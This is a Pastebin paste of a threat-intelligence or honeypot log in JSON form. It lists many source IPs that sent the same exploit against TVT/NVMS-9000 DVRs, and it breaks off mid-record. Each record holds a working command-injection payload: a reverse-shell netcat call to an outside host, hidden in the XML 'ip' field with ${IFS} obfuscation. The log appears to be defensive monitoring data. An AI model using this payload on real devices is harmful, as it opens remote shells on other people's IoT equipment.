Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- "count": 625,
- "next": null,
- "previous": null,
- "results": [
- {
- "source_ip_address": "122.116.198.65",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-24T02:39:22Z",
- "last_seen": "2019-12-24T02:39:22Z"
- },
- {
- "source_ip_address": "1.34.82.230",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-24T02:38:36Z",
- "last_seen": "2019-12-24T02:38:36Z"
- },
- {
- "source_ip_address": "106.1.90.100",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-24T01:30:52Z",
- "last_seen": "2019-12-24T01:30:52Z"
- },
- {
- "source_ip_address": "1.34.84.59",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-24T01:09:30Z",
- "last_seen": "2019-12-24T01:09:30Z"
- },
- {
- "source_ip_address": "114.33.41.203",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-24T01:03:49Z",
- "last_seen": "2019-12-24T01:03:49Z"
- },
- {
- "source_ip_address": "173.168.190.227",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-24T00:51:20Z",
- "last_seen": "2019-12-24T00:51:20Z"
- },
- {
- "source_ip_address": "178.164.180.174",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-24T00:31:51Z",
- "last_seen": "2019-12-24T00:31:51Z"
- },
- {
- "source_ip_address": "84.52.97.249",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 8,
- "first_seen": "2019-12-19T14:43:15Z",
- "last_seen": "2019-12-24T00:30:35Z"
- },
- {
- "source_ip_address": "118.70.105.92",
- "country": "VN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-24T00:18:23Z",
- "last_seen": "2019-12-24T00:18:23Z"
- },
- {
- "source_ip_address": "50.233.0.106",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-19T20:17:26Z",
- "last_seen": "2019-12-24T00:08:45Z"
- },
- {
- "source_ip_address": "98.153.109.181",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T23:36:14Z",
- "last_seen": "2019-12-23T23:36:14Z"
- },
- {
- "source_ip_address": "58.71.221.151",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T23:35:21Z",
- "last_seen": "2019-12-23T23:35:21Z"
- },
- {
- "source_ip_address": "81.182.156.3",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T23:24:31Z",
- "last_seen": "2019-12-23T23:24:31Z"
- },
- {
- "source_ip_address": "31.13.206.100",
- "country": "BG",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T23:22:43Z",
- "last_seen": "2019-12-23T23:22:43Z"
- },
- {
- "source_ip_address": "69.159.172.201",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T23:01:46Z",
- "last_seen": "2019-12-23T23:01:46Z"
- },
- {
- "source_ip_address": "93.42.110.44",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T22:43:04Z",
- "last_seen": "2019-12-23T22:43:04Z"
- },
- {
- "source_ip_address": "175.140.45.250",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T22:36:41Z",
- "last_seen": "2019-12-23T22:36:41Z"
- },
- {
- "source_ip_address": "114.34.138.95",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 15,
- "first_seen": "2019-12-22T14:03:22Z",
- "last_seen": "2019-12-23T22:28:15Z"
- },
- {
- "source_ip_address": "218.161.71.56",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T22:21:21Z",
- "last_seen": "2019-12-23T22:21:21Z"
- },
- {
- "source_ip_address": "99.243.31.33",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 20,
- "first_seen": "2019-12-22T23:11:10Z",
- "last_seen": "2019-12-23T21:54:45Z"
- },
- {
- "source_ip_address": "201.143.239.183",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T21:50:57Z",
- "last_seen": "2019-12-23T21:50:57Z"
- },
- {
- "source_ip_address": "189.250.48.146",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 13,
- "first_seen": "2019-12-23T06:44:54Z",
- "last_seen": "2019-12-23T21:27:53Z"
- },
- {
- "source_ip_address": "118.70.72.102",
- "country": "VN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 11,
- "first_seen": "2019-12-23T21:12:47Z",
- "last_seen": "2019-12-23T21:12:47Z"
- },
- {
- "source_ip_address": "109.65.36.72",
- "country": "IL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T21:03:04Z",
- "last_seen": "2019-12-23T21:03:04Z"
- },
- {
- "source_ip_address": "142.196.26.24",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 22,
- "first_seen": "2019-12-23T06:03:43Z",
- "last_seen": "2019-12-23T20:49:15Z"
- },
- {
- "source_ip_address": "50.233.0.106",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 33,
- "first_seen": "2019-12-22T19:04:57Z",
- "last_seen": "2019-12-23T20:49:10Z"
- },
- {
- "source_ip_address": "198.233.119.179",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T20:37:10Z",
- "last_seen": "2019-12-23T20:37:10Z"
- },
- {
- "source_ip_address": "154.66.154.96",
- "country": "ZA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
